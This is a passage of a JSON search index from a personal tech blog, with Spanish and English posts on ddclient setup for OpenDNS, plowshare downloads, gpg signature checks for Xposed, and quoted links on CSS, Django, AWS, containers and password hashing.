formats,\nnetwork protocols, hardware registers) into the internal format (the data\nstructures that software operates on).\u003c/p\u003e\n\u003cp\u003eIt should be a formal computer-science discipline, because it’s actually a\nlot more difficult than you’d expect. That’s because the majority of\nvulnerabilities in software that hackers exploit are due to parsing bugs.\nSince programmers don’t learn about parsing formally, they figure it out for\nthemselves, creating ad hoc solutions that are prone to bugs. For example,\nprogrammers assume external buffers cannot be larger than internal ones,\nleading to buffer overflows.\u003c/p\u003e","title":"How to teach endian"},{"content":"Si estamos usando el servicio OpenDNS Home y tenemos una IP dinámica, podemos utilizar ddclient, disponible en los repositorios, para actualizar la IP registrada en dicho servicio cada vez que cambie nuestra IP.\nPara ello, lo único que necesitamos es editar el fichero de configuración en /etc/ddclient.conf:\n## ## OpenDNS.com account-configuration ## use=web, web=myip.dnsomatic.com ssl=yes server=updates.opendns.com protocol=dyndns2 login=username@example.com password=opendns_password opendns_network_label Los espacios en el nombre dado a la red se deben sustituir por guiones bajos \u0026ldquo;_\u0026rdquo; y si la contraseña contiene caracteres especiales, se debe encerrar entre comillas simples \u0026ldquo;\u0026rsquo;\u0026rdquo;.\nSi lo acabamos de instalar y seguimos el asistente, el archivo resultante no será exactamente igual:\nProveedor de servicio: updates.opendns.com Protocolo: dyndns2 Nombre de usuario: username@example.com Contraseña: opendns_password Interfaz de red: eth0 Nombres completos de dominios: opendns_network_label\nEsto genera el siguiente archivo de configuración:\nprotocol=dyndns2 use=if, if=eth0 server=updates.opendns.com login=username@example.com password=opendns_password opendns_network_label Para especificar que la IP la coja de un servicio externo en lugar de una interfaz de red, tendremos que cambiar:\nuse=if, if=eth0 por:\nuse=web, web=myip.dnsomatic.com y añadimos que use ssl:\nssl=yes Probamos la configuración:\nsudo ddclient -daemon=0 -debug -verbose -noquiet Para que se ejecute al inicio:\nsudo /sbin/chkconfig ddclient on Para lanzarlo:\nsudo /sbin/service ddclient start ","permalink":"http://karpoke.ignaciocano.com/2016/12/03/actualizar-nuestra-ip-en-el-panel-de-opendns/","summary":"\u003cp\u003eSi estamos usando el servicio \u003ca href=\"https://signup.opendns.com/homefree/\"\u003eOpenDNS Home\u003c/a\u003e y tenemos una IP dinámica,\npodemos utilizar \u003ccode\u003eddclient\u003c/code\u003e, disponible en los repositorios, para actualizar\nla IP registrada en dicho servicio cada vez que \u003ca href=\"https://support.opendns.com/hc/en-us/articles/227987727-Linux-IP-Updater-for-Dynamic-Networks\"\u003ecambie nuestra IP\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003ePara ello, lo único que necesitamos es editar el fichero de configuración en\n\u003ccode\u003e/etc/ddclient.conf\u003c/code\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e##\n## OpenDNS.com account-configuration\n##\nuse=web, web=myip.dnsomatic.com\nssl=yes\nserver=updates.opendns.com\nprotocol=dyndns2\nlogin=username@example.com\npassword=opendns_password\nopendns_network_label\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eLos espacios en el nombre dado a la red se deben sustituir por guiones bajos\n\u0026ldquo;_\u0026rdquo; y si la contraseña contiene caracteres especiales, se debe encerrar entre\ncomillas simples \u0026ldquo;\u0026rsquo;\u0026rdquo;.\u003c/p\u003e","title":"Actualizar nuestra IP en el panel de OpenDNS"},{"content":" This entry describes simple techniques to fulfill the JavaScript compiler optimization process which results in faster running code. Especially in games you immediately notice frame drops and when the garbage collector has to hit in with a big stack of work to do.\n» Felix Maier | medium.com\n","permalink":"http://karpoke.ignaciocano.com/2016/11/30/writing-efficient-javascript/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis entry describes simple techniques to fulfill the JavaScript compiler\noptimization process which results in faster running code. Especially in\ngames you immediately notice frame drops and when the garbage collector has\nto hit in with a big stack of work to do.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Felix Maier | \u003ca href=\"https://medium.com/@xilefmai/efficient-javascript-14a11651d563#.k634iq2t7\" title=\"Writing efficient JavaScript\"\u003emedium.com\u003c/a\u003e\u003c/p\u003e","title":"Writing efficient JavaScript"},{"content":"plowshare es una herramienta diseñada para descargar y subir ficheros a los sitios de intercambio de ficheros más populares. Hace ya un tiempo la podíamos usar para descargar archivos de Megaupload.\nInstalación Primero, instalamos las dependencias:\n$ sudo aptitude install curl recode imagemagick tesseract-ocr-eng spidermonkey-bin rhino perlmagick aview Podemos descargar el código fuente desde el repositorio Git y compilarlo:\n$ git clone https://github.com/mcrapet/plowshare.git $ cd plowshare Podemos instalarlo mediante sudo make install, o si no tenemos privilegios de root, podemos sobreescribir el prefijo /usr con make install prefix=$home/local.\nTambién podemos crear un paquete .deb:\n$ sudo checkinstall Instalamos los módulos externos mediante la herramienta para gestionar dichos módulos:\n$ plowmod --install Más adelante podremos actualizarlos ejecutando:\n$ plowmod --update Descargando Para descargar un enlace de zippyshare, por ejemplo, escribimos:\n$ plowdown http://www43.zippyshare.com/v/laVpgPTS/file.html También podemos pasarle un fichero que contenga los enlaces:\n$ plowdown links.txt Si queremos que modifique el fichero para que comente los enlaces que se han descargado correctamente, no tenemos más que pasarle el argumento -m.\n","permalink":"http://karpoke.ignaciocano.com/2016/11/26/descargar-archivos-de-zippyshare-desde-el-terminal-con-plowshare/","summary":"\u003cp\u003e\u003ca href=\"https://github.com/mcrapet/plowshare\"\u003eplowshare\u003c/a\u003e es una herramienta diseñada para descargar y subir\nficheros a los sitios de intercambio de ficheros más populares. Hace ya\nun tiempo la podíamos usar para \u003ca href=\"/2011/09/18/descargar-archivos-de-megaupload-desde-el-terminal-con-plowshare/\"\u003edescargar archivos de Megaupload\u003c/a\u003e.\u003c/p\u003e\n\u003ch2 id=\"instalación\"\u003eInstalación\u003c/h2\u003e\n\u003cp\u003ePrimero, instalamos las dependencias:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo aptitude install curl recode imagemagick tesseract-ocr-eng spidermonkey-bin rhino perlmagick aview\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003ePodemos descargar el código fuente desde el repositorio Git y compilarlo:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ git clone https://github.com/mcrapet/plowshare.git\n$ cd plowshare\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003ePodemos instalarlo mediante \u003ccode\u003esudo make install\u003c/code\u003e, o si no tenemos privilegios de\nroot, podemos sobreescribir el prefijo \u003ccode\u003e/usr\u003c/code\u003e con\n\u003ccode\u003emake install prefix=$home/local\u003c/code\u003e.\u003c/p\u003e","title":"Descargar archivos de zippyshare desde el terminal con plowshare"},{"content":"Ayer mismo, se subió una nueva versión del framework Xposed, el cual tengo instalado en un Samsung S4.\nSi queremos descargarla y comprobar mediante la firma que lo que nos hemos bajado no ha sido alterado, no tenemos más que hacer uso de gpg.\nDescargamos los archivos:\n$ wget http://dl-xda.xposed.info/framework/sdk23/arm/xposed-v87-sdk23-arm.zip $ wget http://dl-xda.xposed.info/framework/sdk23/arm/xposed-v87-sdk23-arm.zip.asc Y comprobamos la firma:\n$ gpg --verify xposed-v87-sdk23-arm.zip.asc gpg: Signature made jue 24 nov 2016 22:26:15 CET using RSA key ID 852109AA gpg: Can’t check signature: public key not found En este caso, la firma no está certificada por una autoridad de confianza, y tampoco la tenemos importada en nuestro sistema. Vamos a buscarla y, si nos fiamos de esa cuenta de correo, tenemos la opción de importarla:\n$ gpg --search-keys 852109AA gpg: searching for \u0026#34;852109AA\u0026#34; from hkp server keys.gnupg.net (1) rovo89 \u0026lt;android@robv.de\u0026gt; rovo89 \u0026lt;rovo89@xposed.info\u0026gt; 4096 bit RSA key 7235F333, created: 2016-03-12 Keys 1-1 of 1 for \u0026#34;852109AA\u0026#34;. Enter number(s), N)ext, or Q)uit \u0026gt; 1 gpg: requesting key 7235F333 from hkp server keys.gnupg.net gpg: key 7235F333: public key \u0026#34;rovo89 \u0026lt;android@robv.de\u0026gt;\u0026#34; imported gpg: 3 marginal(s) needed, 1 complete(s) needed, PGP trust model gpg: depth: 0 valid: 1 signed: 0 trust: 0-, 0q, 0n, 0m, 0f, 1u gpg: Total number processed: 1 gpg: imported: 1 (RSA: 1) Ahora ya podemos verificar el fichero descargado:\n$ gpg --verify xposed-v87-sdk23-arm.zip.asc gpg: Signature made jue 24 nov 2016 22:26:15 CET using RSA key ID 852109AA gpg: Good signature from \u0026#34;rovo89 \u0026lt;android@robv.de\u0026gt;\u0026#34; gpg: aka \u0026#34;rovo89 \u0026lt;rovo89@xposed.info\u0026gt;\u0026#34; gpg: WARNING: This key is not certified with a trusted signature! gpg: There is no indication that the signature belongs to the owner. Primary key fingerprint: 0DC8 2B3E B1C4 6D48 33B4 C434 E82F 0871 7235 F333 Subkey fingerprint: EA94 3952 EB4E 66EB 8115 1B3E 865B 714E 8521 09AA ","permalink":"http://karpoke.ignaciocano.com/2016/11/25/comprobar-la-firma-de-xposed/","summary":"\u003cp\u003eAyer mismo, se subió una \u003ca href=\"http://dl-xda.xposed.info/framework/sdk23/arm/\"\u003enueva versión\u003c/a\u003e del \u003cem\u003eframework\u003c/em\u003e \u003ca href=\"http://repo.xposed.info/\"\u003eXposed\u003c/a\u003e, el\ncual tengo instalado en un Samsung S4.\u003c/p\u003e\n\u003cp\u003eSi queremos descargarla y comprobar mediante la firma que lo que nos hemos\nbajado no ha sido alterado, no tenemos más que hacer uso de \u003ccode\u003egpg\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eDescargamos los archivos:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ wget http://dl-xda.xposed.info/framework/sdk23/arm/xposed-v87-sdk23-arm.zip\n$ wget http://dl-xda.xposed.info/framework/sdk23/arm/xposed-v87-sdk23-arm.zip.asc\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eY comprobamos la firma:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ gpg --verify xposed-v87-sdk23-arm.zip.asc\ngpg: Signature made jue 24 nov 2016 22:26:15 CET using RSA key ID 852109AA\ngpg: Can’t check signature: public key not found\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEn este caso, la firma no está certificada por una autoridad de confianza, y\ntampoco la tenemos importada en nuestro sistema. Vamos a buscarla y, si nos\nfiamos de esa cuenta de correo, tenemos la opción de importarla:\u003c/p\u003e","title":"Comprobar la firma de Xposed"},{"content":" Software development teams often make decisions about software architecture or technological stack based on inaccurate opinions, social media, and in general on what is considered to be “hot”, rather than solid research and any serious consideration of expected impact on their projects. I call this trend Hype Driven Development, perceive it harmful and advocate for a more professional approach I call “Solid Software Engineering”. Learn more about how it works and find out what you can do instead.\n» Marek Kirejczyk | blog.daftcode.pl\n","permalink":"http://karpoke.ignaciocano.com/2016/11/25/hype-driven-development/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSoftware development teams often make decisions about software architecture\nor technological stack based on inaccurate opinions, social media, and in\ngeneral on what is considered to be “hot”, rather than solid research and\nany serious consideration of expected impact on their projects. I call this\ntrend Hype Driven Development, perceive it harmful and advocate for a more\nprofessional approach I call “Solid Software Engineering”. Learn more about\nhow it works and find out what you can do instead.\u003c/p\u003e","title":"Hype Driven Development"},{"content":" El principal motivo de la creación de IPv6 fue la falta de direcciones IPv4 por la expansión de países altamente poblados como China e India. La principal y más conocida ventaja es el tamaño de su rango de direcciones. Como todo el mundo sabe, una dirección IPv4 consta de 32 bits, lo cual posibilita un direccionamiento de 2^32 máquinas (4.294.967.296). En cambio, una dirección IPv6 está formada por 128 bits, dando lugar a 2^128 direcciones posibles, este número es muy difícil de imaginar, o de manejar, ya que el ser humano no esta acostumbrado a números de tal magnitud.\n» Jesús Largo | securityartwork.es\n","permalink":"http://karpoke.ignaciocano.com/2016/11/25/hasta-el-infinito-y-mas-alla-bienvenido-ipv6-i/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl principal motivo de la creación de IPv6 fue la falta de direcciones IPv4\npor la expansión de países altamente poblados como China e India. La\nprincipal y más conocida ventaja es el tamaño de su rango de direcciones.\nComo todo el mundo sabe, una dirección IPv4 consta de 32 bits, lo cual\nposibilita un direccionamiento de 2^32 máquinas (4.294.967.296). En cambio,\nuna dirección IPv6 está formada por 128 bits, dando lugar a 2^128\ndirecciones posibles, este número es muy difícil de imaginar, o de manejar,\nya que el ser humano no esta acostumbrado a números de tal magnitud.\u003c/p\u003e","title":"Hasta el infinito y más allá. Bienvenido IPv6 (I)"},{"content":"Related:\nWe recently added a bank account like functionality into one of our products. During the development we encountered some textbook problems and I thought it can be a good opportunity to go over some of the patterns we use in our Django models. This article was written in the order in which we usually address new problems:\nDefine the business requirements. Write down a naive implementation and model definition. Challenge the solution. Refine and repeat. » Haki Benita | medium.com\n","permalink":"http://karpoke.ignaciocano.com/2016/11/07/bullet-proofing-django-models/","summary":"\u003cp\u003eRelated:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eWe recently added a bank account like functionality into one of our products.\nDuring the development we encountered some textbook problems and I thought it\ncan be a good opportunity to go over some of the patterns we use in our\nDjango models.\nThis article was written in the order in which we usually address new\nproblems:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eDefine the business requirements.\u003c/li\u003e\n\u003cli\u003eWrite down a naive implementation and model definition.\u003c/li\u003e\n\u003cli\u003eChallenge the solution.\u003c/li\u003e\n\u003cli\u003eRefine and repeat.\u003c/li\u003e\n\u003c/ol\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Haki Benita | \u003ca href=\"https://medium.com/@hakibenita/bullet-proofing-django-models-c080739be4e#.pqtppqgoj\"\u003emedium.com\u003c/a\u003e\u003c/p\u003e","title":"Bullet proofing Django models"},{"content":"Related:\nA lot of information on AWS is already written. Most people learn AWS by reading a blog or a “getting started guide” and referring to the standard AWS references. Nonetheless, trustworthy and practical information and recommendations aren’t easy to come by. AWS’s own documentation is a great but sprawling resource few have time to read fully, and it doesn’t include anything but official facts, so omits experiences of engineers. The information in blogs or Stack Overflow is also not consistently up to date.\nThis guide is by and for engineers who use AWS. It aims to be a useful, living reference that consolidates links, tips, gotchas, and best practices. It arose from discussion and editing over beers by several engineers who have used AWS extensively.\n» github.com\n","permalink":"http://karpoke.ignaciocano.com/2016/11/07/the-open-guide-to-amazon-web-services/","summary":"\u003cp\u003eRelated:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eA lot of information on AWS is already written. Most people learn AWS by\nreading a blog or a “getting started guide” and referring to the standard\nAWS references. Nonetheless, trustworthy and practical information and\nrecommendations aren’t easy to come by. AWS’s own documentation is a\ngreat but sprawling resource few have time to read fully, and it doesn’t\ninclude anything but official facts, so omits experiences of engineers. The\ninformation in blogs or Stack Overflow is also not consistently up to date.\u003c/p\u003e","title":"The open guide to Amazon Web Services"},{"content":"Related:\nCuando los Gobiernos y proveedores de Internet bloquean un portal, nos tenemos que buscar la vida cambiando los DNS, conectándonos a servidores Proxy y VPN e incluso a la red Tor. Streisand es una herramienta gratuita que nos permite automatizar el proceso de configuración de nuevos servidores VPN, Proxy y Tor para proporcionar a los usuarios una solución rápida y fácil, ideal para activistas en Internet.\nVer el proyecto en github.com.\n» Sergio De Luz | redeszone.net\n","permalink":"http://karpoke.ignaciocano.com/2016/11/06/streisand-una-herramienta-que-permite-evadir-la-censura-de-gobiernos-y-isp-de-forma-facil/","summary":"\u003cp\u003eRelated:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eCuando los Gobiernos y proveedores de Internet bloquean un portal, nos\ntenemos que buscar la vida cambiando los DNS, conectándonos a servidores\nProxy y VPN e incluso a la red Tor. Streisand es una herramienta gratuita\nque nos permite automatizar el proceso de configuración de nuevos servidores\nVPN, Proxy y Tor para proporcionar a los usuarios una solución rápida y\nfácil, ideal para activistas en Internet.\u003c/p\u003e\n\u003cp\u003eVer el proyecto en \u003ca href=\"https://github.com/jlund/streisand\"\u003egithub.com\u003c/a\u003e.\u003c/p\u003e","title":"Streisand: Una herramienta que permite evadir la censura de Gobiernos y ISP de forma fácil"},{"content":"Relatd:\nI’ve used Linux containers directly and indirectly for years, but I wanted to become more familiar with them. So I wrote some code. This used to be 500 lines of code, I swear, but I’ve revised it some since publishing; I’ve ended up with about 70 lines more.\nI wanted specifically to find a minimal set of restrictions to run untrusted code. This isn’t how you should approach containers on anything with any exposure: you should restrict everything you can. But I think it’s important to know which permissions are categorically unsafe!\n» Lizzie Dixon | blog.lizzie.io\n","permalink":"http://karpoke.ignaciocano.com/2016/11/01/linux-containers-in-500-lines-of-code/","summary":"\u003cp\u003eRelatd:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eI’ve used Linux containers directly and indirectly for years, but I wanted\nto become more familiar with them. So I wrote some code. This used to be 500\nlines of code, I swear, but I’ve revised it some since publishing; I’ve\nended up with about 70 lines more.\u003c/p\u003e\n\u003cp\u003eI wanted specifically to find a minimal set of restrictions to run untrusted\ncode. This isn’t how you should approach containers on anything with any\nexposure: you should restrict everything you can. But I think it’s important\nto know which permissions are categorically unsafe!\u003c/p\u003e","title":"Linux containers in 500 lines of code"},{"content":"Related:\nThis is the manifest of things I’ve learned about managing CSS in large, complex web projects during my many years of professional web development. I’ve been asked about these things enough times that having a document to point to sounded like a good idea.\nI’ve tried to keep the explanations short, but this is essentially the tl;dr:\nAlways prefer classes Co-locate component code Use consistent class namespacing Maintain a strict mapping between namespaces and filenames Prevent leaking styles outside the component Prevent leaking styles inside the component Respect component boundaries Integrate external styles loosely » Jarno Rantanen | github.com | via css-tricks.com\n","permalink":"http://karpoke.ignaciocano.com/2016/11/01/8-simple-rules-for-a-robust-scalable-css-architecture/","summary":"\u003cp\u003eRelated:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThis is the manifest of things I’ve learned about managing CSS in large,\ncomplex web projects during my many years of professional web development.\nI’ve been asked about these things enough times that having a document to\npoint to sounded like a good idea.\u003c/p\u003e\n\u003cp\u003eI’ve tried to keep the explanations short, but this is essentially the tl;dr:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eAlways prefer classes\u003c/li\u003e\n\u003cli\u003eCo-locate component code\u003c/li\u003e\n\u003cli\u003eUse consistent class namespacing\u003c/li\u003e\n\u003cli\u003eMaintain a strict mapping between namespaces and filenames\u003c/li\u003e\n\u003cli\u003ePrevent leaking styles outside the component\u003c/li\u003e\n\u003cli\u003ePrevent leaking styles inside the component\u003c/li\u003e\n\u003cli\u003eRespect component boundaries\u003c/li\u003e\n\u003cli\u003eIntegrate external styles loosely\u003c/li\u003e\n\u003c/ol\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Jarno Rantanen | \u003ca href=\"https://github.com/jareware/css-architecture/blob/master/README.md\"\u003egithub.com\u003c/a\u003e | via \u003ca href=\"https://css-tricks.com/8-simple-rules-robust-scalable-css-architecture/\"\u003ecss-tricks.com\u003c/a\u003e\u003c/p\u003e","title":"8 simple rules for a robust, scalable CSS architecture"},{"content":" CockroachDB is a distributed SQL database. The primary design goals are scalability, strong consistency and survivability (hence the name). CockroachDB aims to tolerate disk, machine, rack, and even datacenter failures with minimal latency disruption and no manual intervention. CockroachDB nodes are symmetric; a design goal is homogeneous deployment (one binary) with minimal configuration and no required external dependencies.\n» Spencer Kimball | github.com\n","permalink":"http://karpoke.ignaciocano.com/2016/10/02/the-design-of-cockroachdb/","summary":"\u003cblockquote\u003e\n\u003cp\u003eCockroachDB is a distributed SQL database. The primary design goals are\nscalability, strong consistency and survivability (hence the name).\nCockroachDB aims to tolerate disk, machine, rack, and even datacenter\nfailures with minimal latency disruption and no manual intervention.\nCockroachDB nodes are symmetric; a design goal is homogeneous deployment\n(one binary) with minimal configuration and no required external\ndependencies.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Spencer Kimball | \u003ca href=\"https://github.com/cockroachdb/cockroach/blob/develop/docs/design.md\"\u003egithub.com\u003c/a\u003e\u003c/p\u003e","title":"The design of CockroachDB"},{"content":" First of all we have to define what is meant by ‘composition’. Composition refers to the way the various elements in a scene are arranged within the frame. As I’ve already mentioned, these are not hard and fast rules but guidelines. That said, many of them have been used in art for thousands of years and they really do help achieve more attractive compositions. I find that I usually have one or more of these guidelines in the back of my mind as I’m setting up a shot.\n» Barry O Carroll | bocphotography.com\n","permalink":"http://karpoke.ignaciocano.com/2016/09/29/improve-your-photographic-composition-by-following-these-guidelines/","summary":"\u003cblockquote\u003e\n\u003cp\u003eFirst of all we have to define what is meant by ‘composition’.\nComposition refers to the way the various elements in a scene are arranged\nwithin the frame. As I’ve already mentioned, these are not hard and fast\nrules but guidelines. That said, many of them have been used in art for\nthousands of years and they really do help achieve more attractive\ncompositions. I find that I usually have one or more of these guidelines in\nthe back of my mind as I’m setting up a shot.\u003c/p\u003e","title":"Improve your photographic composition by following these guidelines"},{"content":" Somewhere, way down at the bottom of the list of requirements, behind, fast, cheap, and flexible is “secure”. That is, until something goes wrong, until the system you build is compromised, then suddenly security is, and always was, the most important thing.\nSecurity is a cross-functional concern a bit like Performance. And a bit unlike Performance. Like Performance, our business owners often know they need Security, but aren’t always sure how to quantify it. Unlike Performance, they often don’t know “secure enough” when they see it.\nSo how can a developer work in a world of vague security requirements and unknown threats? Advocating for defining those requirements and identifying those threats is a worthy exercise, but one that takes time and therefore money. Much of the time developers will operate in absence of specific security requirements and while their organization grapples with finding ways to introduce security concerns into the requirements intake processes, they will still build systems and write code.\n» Cade Cairns and Daniel Somerfield | martinfowler.com\n","permalink":"http://karpoke.ignaciocano.com/2016/09/25/the-basics-of-web-application-security/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSomewhere, way down at the bottom of the list of requirements, behind, fast,\ncheap, and flexible is “secure”. That is, until something goes wrong, until\nthe system you build is compromised, then suddenly security is, and always\nwas, the most important thing.\u003c/p\u003e\n\u003cp\u003eSecurity is a cross-functional concern a bit like Performance. And a bit\nunlike Performance. Like Performance, our business owners often know they need\nSecurity, but aren’t always sure how to quantify it. Unlike Performance, they\noften don’t know “secure enough” when they see it.\u003c/p\u003e","title":"The basics of web application security"},{"content":" Al principio me molestaba en calcular métricas sobre el código fuente (utilizaba cosas como Source Monitor para ello), que me indicaran número de líneas de código, complejidad ciclomática, nivel máximo de anidamiento, profundidad de jerarquías…., en fin todo tipo de datos para disfrutar con un poco de porno de estadísticas. Además, analizaba la cobertura de código que alcanzaban mis tests (con NCover, si no recuerdo mal), y tenía configurados mis avisos si no llegaban a determinados niveles.\nNunca les hice excesivo caso, pero era bonito tenerlas y consultarlas de vez en cuando, e incluso a veces me servían para ver áreas que podía mejorar refactorizando el código o añadiendo más tests.\nHoy en día no uso este tipo de indicadores y no los echo en absoluto de menos, pero antes de ver por qué yo no consigo sacarles mucho partido, vamos a ver qué razonamientos hay detrás del uso de métricas y por qué, a lo mejor a ti, sí que te resultan útiles.\n» Juan María Hernández | blog.koalite.com\n","permalink":"http://karpoke.ignaciocano.com/2016/09/25/por-que-no-utilizo-metricas/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAl principio me molestaba en calcular métricas sobre el código fuente\n(utilizaba cosas como Source Monitor para ello), que me indicaran número de\nlíneas de código, complejidad ciclomática, nivel máximo de anidamiento,\nprofundidad de jerarquías…., en fin todo tipo de datos para disfrutar con\nun poco de porno de estadísticas. Además, analizaba la cobertura de código\nque alcanzaban mis tests (con NCover, si no recuerdo mal), y tenía\nconfigurados mis avisos si no llegaban a determinados niveles.\u003c/p\u003e","title":"Por qué no utilizo métricas"},{"content":" There are a lot of ways to work with color on the web. I think it’s helpful to understand the mechanics behind what you’re using, and color is no exception. Let’s delve into some of the technical details of color on the web.\n» Sarah Drasner | css-tricks.com\n","permalink":"http://karpoke.ignaciocano.com/2016/09/25/a-nerds-guide-to-color-on-the-web/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThere are a lot of ways to work with color on the web. I think it’s helpful\nto understand the mechanics behind what you’re using, and color is no\nexception. Let’s delve into some of the technical details of color on the\nweb.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Sarah Drasner | \u003ca href=\"https://css-tricks.com/nerds-guide-color-web/\"\u003ecss-tricks.com\u003c/a\u003e\u003c/p\u003e","title":"A nerd’s guide to color on the web"},{"content":" I don’t know anything about music. I know there are letters but sometimes the letters have squiggles; I know an octave doubles in pitch; I know you can write a pop song with only four chords. That’s about it.\nThe rest has always seemed completely, utterly arbitrary. Why do we have twelve notes, but represent them with only seven letters? Where did the key signatures come from? Why is every Wikipedia article on this impossible to read without first having read all the others?\nA few days ago, some of it finally clicked. I feel like an idiot for not getting it earlier, but I suppose it doesn’t help that everyone explains music using, well, musical notation, which doesn’t make any sense if you don’t know why it’s like that in the first place.\n» Lexy Munroe | eev.ee\n","permalink":"http://karpoke.ignaciocano.com/2016/09/25/music-theory-for-nerds/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI don’t know anything about music. I know there are letters but sometimes\nthe letters have squiggles; I know an octave doubles in pitch; I know you\ncan write a pop song with only four chords. That’s about it.\u003c/p\u003e\n\u003cp\u003eThe rest has always seemed completely, utterly arbitrary. Why do we have\ntwelve notes, but represent them with only seven letters? Where did the key\nsignatures come from? Why is every Wikipedia article on this impossible to\nread without first having read all the others?\u003c/p\u003e","title":"Music theory for nerds"},{"content":" If you’re reading this page, chances are that you’re already well aware that E.T. for the Atari 2600 is one of the most reviled games ever made. I never understood why. As a child, it was one of my favorite games. I still think it’s a good game. Apparently, I’m not alone.\nOn this page I’m going to briefly explore why people hate E.T., and how the game can be fixed.\n» necomputer.org\n","permalink":"http://karpoke.ignaciocano.com/2016/09/24/fixing-e-t-the-extra-terrestrial-for-the-atari-2600/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIf you’re reading this page, chances are that you’re already well aware\nthat E.T. for the Atari 2600 is one of the most reviled games ever made. I\nnever understood why. As a child, it was one of my favorite games. I still\nthink it’s a good game. Apparently, I’m not alone.\u003c/p\u003e\n\u003cp\u003eOn this page I’m going to briefly explore why people hate E.T., and how the\ngame can be fixed.\u003c/p\u003e","title":"Fixing E.T. The Extra-Terrestrial for the Atari 2600"},{"content":" It’s universally acknowledged that it’s a bad idea to store plain-text passwords. If a database containing plain-text passwords is compromised, user accounts are in immediate danger. For this reason, as early as 1976, the industry standardized on storing passwords using secure, one-way hashing mechanisms (starting with Unix Crypt). Unfortunately, while this prevents the direct reading of passwords in case of a compromise, all hashing mechanisms necessarily allow attackers to brute force the hash offline, by going through lists of possible passwords, hashing them, and comparing the result. In this context, secure hashing functions like SHA have a critical flaw for password hashing: they are designed to be fast. A modern commodity CPU can generate millions of SHA256 hashes per second. Specialized GPU clusters allow for calculating hashes at a rate of billions per second.\n» Devdatta Akhawe | blogs.dropbox.com\n","permalink":"http://karpoke.ignaciocano.com/2016/09/24/how-dropbox-securely-stores-your-passwords/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIt’s universally acknowledged that it’s a bad idea to store plain-text\npasswords. If a database containing plain-text passwords is compromised,\nuser accounts are in immediate danger. For this reason, as early as 1976,\nthe industry standardized on storing passwords using secure, one-way hashing\nmechanisms (starting with Unix Crypt). Unfortunately, while this prevents\nthe direct reading of passwords in case of a compromise, all hashing\nmechanisms necessarily allow attackers to brute force the hash offline, by\ngoing through lists of possible passwords, hashing them, and comparing the\nresult. In this context, secure hashing functions like SHA have a critical\nflaw for password hashing: they are designed to be fast. A modern commodity\nCPU can generate millions of SHA256 hashes per second. Specialized GPU\nclusters allow for calculating hashes at a rate of billions per second.\u003c/p\u003e","title":"How Dropbox securely stores your passwords"},{"content":" The earliest incarnation I can find is in ALGOL 58. The original description of ALGOL 58 is a fascinating read — it’s written like a math paper, with literal text in italics and heavy use of subscripts. Character classes are even named by Greek letters, with λ representing letters and so on. The example program at the end is completely incomprehensible, with almost every variable being a single letter and labels forming their own entire column on the left side. I guess that last bit came from FORTRAN.\n» Eevee | eev.ee\n","permalink":"http://karpoke.ignaciocano.com/2016/09/22/the-curious-case-of-the-switch-statement/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe earliest incarnation I can find is in ALGOL 58. The original\ndescription of ALGOL 58 is a fascinating read — it’s written like a math\npaper, with literal text in italics and heavy use of subscripts. Character\nclasses are even named by Greek letters, with λ representing letters and so\non. The example program at the end is completely incomprehensible, with\nalmost every variable being a single letter and labels forming their own\nentire column on the left side. I guess that last bit came from FORTRAN.\u003c/p\u003e","title":"The curious case of the switch statement"},{"content":" Computer science books contains timeless wisdom, but performance advice doesn’t always age well. When reading Programming Pearls, by Jon Bentley, I’ve found more modern hardware advances that puts conventional wisdom on its head.\n» Franklin He | medium.com\n","permalink":"http://karpoke.ignaciocano.com/2016/09/22/programming-pearls-and-python-fails/","summary":"\u003cblockquote\u003e\n\u003cp\u003eComputer science books contains timeless wisdom, but performance advice\ndoesn’t always age well. When reading Programming Pearls, by Jon Bentley,\nI’ve found more modern hardware advances that puts conventional wisdom on\nits head.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Franklin He | \u003ca href=\"https://medium.com/@n0mad/programming-pearls-and-python-fails-c4fc2962c3ed#.h0k9913hy\"\u003emedium.com\u003c/a\u003e\u003c/p\u003e","title":"Programming Pearls and Python fails"},{"content":" Es un periodo en la historia del software bien diferenciado. Uno en el que muchos jugadores se sumaron a la industria, sin saber apenas qué había antes. Probablemente también fueron los años en los que nacieron un mayor número de propiedades intelectuales. Y también es el inicio de la generación PlayStation, asentándose un modelo de negocio (consumo rápido, gran oferta de videojuegos) que permanece hasta nuestros días. Hablamos de una época que empieza en 1993 y acaba en 1996. Tres años en los que los videojuegos en dos dimensiones pasaron de dominar la industria (y ser casi el único camino viable en ella) a 